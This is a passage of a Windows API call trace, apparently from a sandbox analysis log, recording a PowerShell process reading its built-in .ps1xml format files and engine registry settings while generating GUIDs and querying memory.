	[0430.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.606] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x5c14d60f, Data2=0x472f, Data3=0x4755, Data4=([0]=0x9b, [1]=0xb, [2]=0x13, [3]=0x37, [4]=0x68, [5]=0xd3, [6]=0x3d, [7]=0x71))) returned 0x0
	[0430.606] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa8dff824, Data2=0xf2dc, Data3=0x40a9, Data4=([0]=0xb8, [1]=0x70, [2]=0x28, [3]=0xa0, [4]=0x14, [5]=0x9a, [6]=0x79, [7]=0x2d))) returned 0x0
	[0430.607] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x73603057, Data2=0xce73, Data3=0x45be, Data4=([0]=0x97, [1]=0x89, [2]=0x13, [3]=0x2a, [4]=0x56, [5]=0xdb, [6]=0x87, [7]=0x48))) returned 0x0
	[0430.607] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xe773dadc, Data2=0xc85d, Data3=0x44eb, Data4=([0]=0xbf, [1]=0x1f, [2]=0xa7, [3]=0x8d, [4]=0x2, [5]=0x71, [6]=0x7a, [7]=0xef))) returned 0x0
	[0430.607] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb7be7f82, Data2=0xa1c1, Data3=0x40d4, Data4=([0]=0xb2, [1]=0x3c, [2]=0x12, [3]=0xaa, [4]=0x88, [5]=0xbd, [6]=0x15, [7]=0xea))) returned 0x0
	[0430.607] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x3e28e761, Data2=0x99c9, Data3=0x4682, Data4=([0]=0xa1, [1]=0xc9, [2]=0x7b, [3]=0xfc, [4]=0xb7, [5]=0xa7, [6]=0xc2, [7]=0xd8))) returned 0x0
	[0430.607] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.607] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x9d42357, Data2=0xa9a6, Data3=0x4db8, Data4=([0]=0xb4, [1]=0x5e, [2]=0xec, [3]=0xa5, [4]=0x7f, [5]=0xa8, [6]=0xa4, [7]=0x99))) returned 0x0
	[0430.607] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.608] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.608] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x48fb45ee, Data2=0xfd49, Data3=0x47d0, Data4=([0]=0x95, [1]=0x25, [2]=0xf3, [3]=0xf2, [4]=0xe1, [5]=0x8a, [6]=0xbf, [7]=0xb8))) returned 0x0
	[0430.608] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa8369636, Data2=0xdf9c, Data3=0x48b2, Data4=([0]=0x82, [1]=0x25, [2]=0x2f, [3]=0x54, [4]=0xa5, [5]=0xdc, [6]=0x17, [7]=0x10))) returned 0x0
	[0430.608] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x6358535a, Data2=0x5fa5, Data3=0x403c, Data4=([0]=0xbf, [1]=0xed, [2]=0x39, [3]=0x5f, [4]=0xc5, [5]=0x3a, [6]=0x2b, [7]=0x77))) returned 0x0
	[0430.608] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb801934b, Data2=0x9074, Data3=0x4e5d, Data4=([0]=0x8a, [1]=0x41, [2]=0x14, [3]=0xa9, [4]=0xbc, [5]=0x67, [6]=0x85, [7]=0x1c))) returned 0x0
	[0430.608] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.608] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf18aaf23, Data2=0x2dc0, Data3=0x4fbc, Data4=([0]=0xa5, [1]=0x2a, [2]=0xb2, [3]=0x63, [4]=0xc4, [5]=0xd1, [6]=0x98, [7]=0x6a))) returned 0x0
	[0430.609] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.609] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.609] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.609] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.609] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.609] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa17c52e2, Data2=0x59d1, Data3=0x47c3, Data4=([0]=0xb1, [1]=0x55, [2]=0x23, [3]=0x81, [4]=0x72, [5]=0x45, [6]=0x90, [7]=0x1b))) returned 0x0
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc5d5ae39, Data2=0x2447, Data3=0x4144, Data4=([0]=0x94, [1]=0x3b, [2]=0x19, [3]=0x35, [4]=0xb, [5]=0x8f, [6]=0xf6, [7]=0x20))) returned 0x0
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xcca40578, Data2=0x5de5, Data3=0x414a, Data4=([0]=0xbe, [1]=0xde, [2]=0xe8, [3]=0xa6, [4]=0x23, [5]=0x6a, [6]=0xae, [7]=0xc7))) returned 0x0
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x126d685d, Data2=0xdedd, Data3=0x482d, Data4=([0]=0x90, [1]=0xe3, [2]=0x88, [3]=0x86, [4]=0x3, [5]=0x65, [6]=0xc3, [7]=0xc5))) returned 0x0
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4a5a863d, Data2=0x3bd4, Data3=0x40b0, Data4=([0]=0x90, [1]=0x91, [2]=0xea, [3]=0x61, [4]=0xb6, [5]=0xad, [6]=0xd5, [7]=0xe2))) returned 0x0
	[0430.610] VirtualQuery (in: lpAddress=0x24bec0, lpBuffer=0x24cd80, dwLength=0x30 | out: lpBuffer=0x24cd80*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xac9e0255, Data2=0xc9e9, Data3=0x49d7, Data4=([0]=0xaa, [1]=0xf2, [2]=0x8e, [3]=0x83, [4]=0x41, [5]=0x52, [6]=0x63, [7]=0x74))) returned 0x0
	[0430.610] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb228a839, Data2=0xbdae, Data3=0x42e0, Data4=([0]=0xbc, [1]=0xe2, [2]=0x58, [3]=0xd2, [4]=0x8e, [5]=0xaa, [6]=0xd5, [7]=0x50))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb7f4ccc5, Data2=0x2baf, Data3=0x46da, Data4=([0]=0x9b, [1]=0xcb, [2]=0xc9, [3]=0xea, [4]=0xc7, [5]=0x1b, [6]=0x9e, [7]=0x42))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x182772c6, Data2=0xc746, Data3=0x45ef, Data4=([0]=0xb1, [1]=0x7a, [2]=0x93, [3]=0x12, [4]=0xda, [5]=0x66, [6]=0x50, [7]=0x94))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x43f0827a, Data2=0x8a7f, Data3=0x4263, Data4=([0]=0x8d, [1]=0x98, [2]=0xcf, [3]=0xd2, [4]=0x51, [5]=0x46, [6]=0xac, [7]=0x6c))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc246b658, Data2=0x5646, Data3=0x4232, Data4=([0]=0xa7, [1]=0xea, [2]=0xd5, [3]=0x2f, [4]=0x46, [5]=0x92, [6]=0xd4, [7]=0xcb))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x76cec439, Data2=0xaca3, Data3=0x4637, Data4=([0]=0x94, [1]=0xdd, [2]=0xdb, [3]=0xcb, [4]=0x9, [5]=0xec, [6]=0x9, [7]=0xea))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xdc7ed706, Data2=0xdca6, Data3=0x4367, Data4=([0]=0x90, [1]=0x7c, [2]=0xb2, [3]=0xed, [4]=0xdb, [5]=0x74, [6]=0x2b, [7]=0xce))) returned 0x0
	[0430.611] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x90fd9414, Data2=0x73c2, Data3=0x451d, Data4=([0]=0xaa, [1]=0xf9, [2]=0x2e, [3]=0xab, [4]=0xfb, [5]=0x24, [6]=0x82, [7]=0x8d))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1733c552, Data2=0xbbfc, Data3=0x464a, Data4=([0]=0x93, [1]=0x0, [2]=0x99, [3]=0x29, [4]=0xf7, [5]=0x34, [6]=0xaa, [7]=0x56))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xee5a79f1, Data2=0x1c64, Data3=0x481b, Data4=([0]=0xa0, [1]=0x96, [2]=0x5d, [3]=0x42, [4]=0xc5, [5]=0x5f, [6]=0x8d, [7]=0xdd))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf0d53e6f, Data2=0xbd35, Data3=0x44aa, Data4=([0]=0xb7, [1]=0x47, [2]=0xaf, [3]=0x48, [4]=0x91, [5]=0xee, [6]=0x7d, [7]=0xba))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x843549cb, Data2=0x48c, Data3=0x4690, Data4=([0]=0xaf, [1]=0x63, [2]=0x1f, [3]=0x4f, [4]=0x36, [5]=0xf6, [6]=0xc9, [7]=0xd2))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc7c5f926, Data2=0xac42, Data3=0x4a21, Data4=([0]=0x9c, [1]=0x1d, [2]=0xc1, [3]=0x1f, [4]=0xe0, [5]=0xfd, [6]=0x4d, [7]=0x1e))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x22219540, Data2=0xbd99, Data3=0x4056, Data4=([0]=0xa6, [1]=0x49, [2]=0x70, [3]=0xc1, [4]=0xeb, [5]=0xcb, [6]=0x18, [7]=0x1f))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf6d3fe91, Data2=0x30c6, Data3=0x4c29, Data4=([0]=0x8c, [1]=0x2d, [2]=0x6e, [3]=0x6, [4]=0x83, [5]=0x86, [6]=0x69, [7]=0x80))) returned 0x0
	[0430.612] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xdf97c423, Data2=0xd1d5, Data3=0x4bdb, Data4=([0]=0xb2, [1]=0xb0, [2]=0x7, [3]=0xd0, [4]=0x41, [5]=0x8, [6]=0xaf, [7]=0x5d))) returned 0x0
	[0430.613] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb65a04b4, Data2=0xaf85, Data3=0x4d37, Data4=([0]=0x83, [1]=0xa1, [2]=0x1e, [3]=0xfc, [4]=0x88, [5]=0x3a, [6]=0x72, [7]=0xd9))) returned 0x0
	[0430.613] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xe3b186d6, Data2=0x9fa9, Data3=0x4c8b, Data4=([0]=0xbc, [1]=0xcb, [2]=0xd3, [3]=0x92, [4]=0x31, [5]=0xbd, [6]=0xd6, [7]=0x12))) returned 0x0
	[0430.613] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.613] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.613] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.614] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1bbbe7da, Data2=0xb576, Data3=0x4ef3, Data4=([0]=0xa5, [1]=0x30, [2]=0x50, [3]=0xe2, [4]=0x1b, [5]=0xe1, [6]=0x37, [7]=0xed))) returned 0x0
	[0430.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.614] SetErrorMode (uMode=0x1) returned 0x1
	[0430.614] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.615] GetFileType (hFile=0x320) returned 0x1
	[0430.615] SetErrorMode (uMode=0x1) returned 0x1
	[0430.615] GetFileType (hFile=0x320) returned 0x1
	[0430.615] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.615] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.615] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.615] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.616] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.616] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.616] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x119, lpOverlapped=0x0) returned 1
	[0430.616] ReadFile (in: hFile=0x320, lpBuffer=0x362c680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x362c680*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.616] SetErrorMode (uMode=0x1) returned 0x1
	[0430.616] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0430.616] SetErrorMode (uMode=0x1) returned 0x1
	[0430.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.617] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.617] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.617] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.617] CoTaskMemFree (pv=0x48e830) 
	[0430.617] RegCloseKey (hKey=0x320) returned 0x0
	[0430.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.618] VirtualQuery (in: lpAddress=0x24bac0, lpBuffer=0x24c980, dwLength=0x30 | out: lpBuffer=0x24c980*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.618] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x2e3df96f, Data2=0xffa8, Data3=0x4446, Data4=([0]=0xb0, [1]=0xe6, [2]=0xee, [3]=0xf1, [4]=0x70, [5]=0x92, [6]=0xd6, [7]=0xbd))) returned 0x0
	[0430.618] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.619] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd8e76e92, Data2=0x52bb, Data3=0x4a37, Data4=([0]=0x91, [1]=0xfd, [2]=0x12, [3]=0xf9, [4]=0x13, [5]=0x5f, [6]=0x4b, [7]=0x75))) returned 0x0
	[0430.619] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x90fee4ad, Data2=0x66d8, Data3=0x46d6, Data4=([0]=0x96, [1]=0xf, [2]=0x30, [3]=0x1e, [4]=0x58, [5]=0x56, [6]=0x6a, [7]=0x9b))) returned 0x0
	[0430.619] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x31e97f1b, Data2=0xbcbb, Data3=0x49da, Data4=([0]=0x8f, [1]=0x4d, [2]=0xe, [3]=0xc7, [4]=0xda, [5]=0xd2, [6]=0x8f, [7]=0x60))) returned 0x0
	[0430.619] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.619] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.620] SetErrorMode (uMode=0x1) returned 0x1
	[0430.620] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.620] GetFileType (hFile=0x320) returned 0x1
	[0430.620] SetErrorMode (uMode=0x1) returned 0x1
	[0430.620] GetFileType (hFile=0x320) returned 0x1
	[0430.620] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.620] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.620] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
